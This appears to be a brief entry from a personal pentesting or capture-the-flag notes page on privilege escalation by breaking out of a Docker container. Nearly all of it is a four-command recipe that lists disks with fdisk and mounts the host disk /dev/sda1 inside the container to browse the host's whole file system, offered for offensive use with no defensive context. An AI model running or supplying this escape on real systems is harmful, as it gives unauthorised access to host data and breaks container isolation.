Priv Escalation

Breaking out of docker environment

List disks this way:

fdisk -l 
mkdir /mnt/own
mount /dev/sda1 /mnt/own
cd /mnt/own

Once we do that we can browse the entire file system as nothing.

Last updated